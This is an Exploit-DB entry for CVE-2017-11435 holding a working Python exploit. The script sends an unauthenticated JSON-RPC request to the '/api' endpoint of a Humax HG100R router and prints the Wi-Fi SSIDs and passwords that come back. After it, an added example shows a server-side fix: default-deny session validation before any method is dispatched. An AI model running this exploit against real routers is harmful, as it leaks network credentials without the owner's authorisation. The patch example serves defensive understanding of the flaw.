Humax Wi-Fi Router HG100R 2.0.6 – Authentication Bypass

  • Author: Kivson
    Date: 2017-09-14
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/42732/
  • # coding: utf-8
    
    # Exploit Title: Humax HG100R-* Authentication Bypass
    # Date: 14/09/2017
    # Exploit Author: Kivson
    # Vendor Homepage: http://humaxdigital.com
    # Version: VER 2.0.6
    # Tested on: OSX Linux
    # CVE : CVE-2017-11435
    
    
    # The Humax Wi-Fi Router model HG100R-* 2.0.6 is prone to an authentication bypass vulnerability via specially
    # crafted requests to the management console. The bug is exploitable remotely when the router is configured to
    # expose the management console.
    # The router is not validating the session token while returning answers for some methods in url '/api'.
    # An attacker can use this vulnerability to retrieve sensitive information such
    # as private/public IP addresses, SSID names, and passwords.
    
    import sys
    import requests
    
    
    def print_help():
        print('Exploit syntax error, Example:')
        print('python exploit.py http://192.168.0.1')


    def exploit(host):
        print(f'Connecting to {host}')
        path = '/api'
        # JSON-RPC request; no session token accompanies it
        payload = '{"method":"QuickSetupInfo","id":90,"jsonrpc":"2.0"}'

        response = requests.post(host + path, data=payload)
        response.raise_for_status()

        # Parse the body once and check for the expected structure
        data = response.json()
        if 'result' not in data or 'WiFi_Info' not in data['result'] or 'wlan' not in \
                data['result']['WiFi_Info']:
            print('Error, target may not be exploitable')
            return

        for wlan in data['result']['WiFi_Info']['wlan']:
            print('Wifi data found:')
            print(f'SSID: {wlan["ssid"]}')
            print(f'PWD: {wlan["password"]}')


    def main():
        if len(sys.argv) < 2:
            print_help()
            return
        host = sys.argv[1]
        exploit(host)


    if __name__ == '__main__':
        main()
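
The root cause described in the header comments is a '/api' dispatcher that answers some methods without validating the session token. The block below is an added example, not code from the advisory or from the Humax firmware: it models the server-side fix, a default-deny session check applied before any method is dispatched. The `handle_api` function, the `LoginPageInfo` method name, the token and the Wi-Fi values are all constructed assumptions.

```python
import hmac
import json

# Constructed sample state: token, SSID and password are made-up values.
VALID_SESSIONS = {"3f9c1e7a-constructed-token"}
WIFI_INFO = {"wlan": [{"ssid": "example-ssid", "password": "example-pass"}]}

def quick_setup_info(params):
    return {"WiFi_Info": WIFI_INFO}

def login_page_info(params):  # hypothetical method that needs no session
    return {"model": "example-router"}

METHODS = {"QuickSetupInfo": quick_setup_info, "LoginPageInfo": login_page_info}
# Explicit allow-list: anything not named here requires a valid session.
PUBLIC_METHODS = {"LoginPageInfo"}

def session_ok(token):
    if not isinstance(token, str):
        return False
    # Constant-time comparison against every live session token.
    return any(hmac.compare_digest(token.encode(), s.encode())
               for s in VALID_SESSIONS)

def error(req_id, code, message):
    return {"jsonrpc": "2.0", "id": req_id,
            "error": {"code": code, "message": message}}

def handle_api(body, token=None):
    """Dispatch one JSON-RPC request; 'token' is the caller's session token."""
    try:
        req = json.loads(body)
        method, req_id = req["method"], req.get("id")
    except (ValueError, KeyError, TypeError, AttributeError):
        return error(None, -32600, "Invalid Request")
    if not isinstance(method, str):
        return error(req_id, -32600, "Invalid Request")
    # Default deny, checked before the method lookup so unauthenticated
    # callers cannot enumerate which methods exist.
    if method not in PUBLIC_METHODS and not session_ok(token):
        return error(req_id, -32001, "Unauthorized")
    handler = METHODS.get(method)
    if handler is None:
        return error(req_id, -32601, "Method not found")
    return {"jsonrpc": "2.0", "id": req_id, "result": handler(req.get("params"))}
```

With this ordering a newly added method is protected unless someone deliberately lists it in `PUBLIC_METHODS`, which is the opposite of the per-method opt-in pattern that leaves individual handlers exposed.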